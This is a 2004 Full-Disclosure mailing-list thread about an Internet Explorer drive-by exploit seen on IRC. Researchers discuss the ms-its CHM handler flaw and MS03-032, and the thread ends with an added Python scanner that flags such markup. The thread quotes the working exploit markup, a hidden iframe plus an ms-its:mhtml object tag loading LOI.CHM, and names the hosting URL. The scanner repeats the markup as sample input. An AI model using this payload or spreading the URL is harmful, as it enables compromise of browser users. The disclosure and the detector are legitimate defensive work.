Message-ID: <8B32EDC90D8F4E4AB40918883281874D52314C@pivxwin2k1.secnet.pivx.com>
From: thor at pivx.com (Thor Larholm)
Subject: IE exploit going around on irc

The MS03-032 Object Data vulnerability dealt with improper handling of
HTA mime-types.

What Niek forwarded is using the Ibiza CHM exploit that deals with
improper privileges gained through the ms-its/ms-itss URL protocol
handlers which is still unpatched.

Roozbeh Afrasiabi on this and others:
http://www.securityfocus.com/archive/1/358913/2004-03-26/2004-04-01/0
Drew Copley:
http://www.securityfocus.com/archive/1/358914/2004-03-26/2004-04-01/0
My post in February:
http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@...x.com
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
Qwik-Fix
<http://www.qwik-fix.net>
-----Original Message-----
From: David Jacoby [mailto:bugtraq@...p.hack.se]
Sent: Monday, April 05, 2004 11:38 PM
To: full-disclosure@...ts.netsys.com
Subject: Re: [Full-Disclosure] IE exploit going around on irc
I just found this information:
http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor.html
"Download.Tagdoor is a group of Trojan horses that exploit the Internet
Explorer Object Tag Vulnerability. (This is described in Microsoft
Security Bulletin MS03-032. )"
((pewp))
On Mon, 2004-04-05 at 19:52, Niek Baakman wrote:
> Hi list,
>
> this thing's been going around on irc the last few days:
>
> www.divx.dc-hub.com (IE users don't click it!)
> check source:
> <iframe src='loi.htm' width=0 height=0></iframe>
>
> loi.htm contains:
> <object data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
> type="text/x-scriptlet"></object>
>
>
> LOI.CHM is attached
>
> Regards,
>
> Niek Baakman
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
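
Added example (not part of the original thread or any poster's code): a Python check for proxy, mail-gateway or cached-page content that flags markup using the ms-its/ms-itss handlers or the nested mhtml: wrapper seen in the quoted loi.htm, plus the zero-size iframe that loads it. The names scheme_chain, Scanner and scan are assumptions, and the sample input is constructed from the snippet quoted above.

```python
import re
from html.parser import HTMLParser

# Handlers named in the thread, plus the mhtml: wrapper nested inside the quoted URL.
SUSPECT = {"ms-its", "ms-itss", "mhtml"}
URL_ATTRS = ("data", "src", "href")
SCHEME = re.compile(r"[a-z][a-z0-9+.-]*:")


def scheme_chain(url):
    """Return the stacked leading schemes, e.g. 'a:b:file://x' -> ['a', 'b', 'file']."""
    url, chain = url.strip().lower(), []
    while (m := SCHEME.match(url)):
        chain.append(m.group()[:-1])
        url = url[m.end():]
    return chain


class Scanner(HTMLParser):
    """Records (line, tag, reason) for every start tag that looks suspicious."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        line = self.getpos()[0]
        for name in URL_ATTRS:
            hits = SUSPECT.intersection(scheme_chain(a.get(name, "")))
            if hits:
                self.findings.append((line, tag, "handler:" + "+".join(sorted(hits))))
        # Invisible frames are how the quoted page pulled in loi.htm.
        if tag == "iframe" and a.get("width") == "0" and a.get("height") == "0":
            self.findings.append((line, tag, "zero-size iframe"))


def scan(html):
    s = Scanner()
    s.feed(html)
    s.close()
    return s.findings


# Constructed sample: the two tags quoted in the thread plus one benign link.
SAMPLE = r"""<html><body>
<iframe src='loi.htm' width=0 height=0></iframe>
<object data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
 type="text/x-scriptlet"></object>
<a href="http://example.invalid/help.html">help</a>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit on the handler check in content fetched from the Internet zone is worth an alert on its own; the zero-size iframe finding is weaker and is best used to raise the score of a page that also has a handler hit.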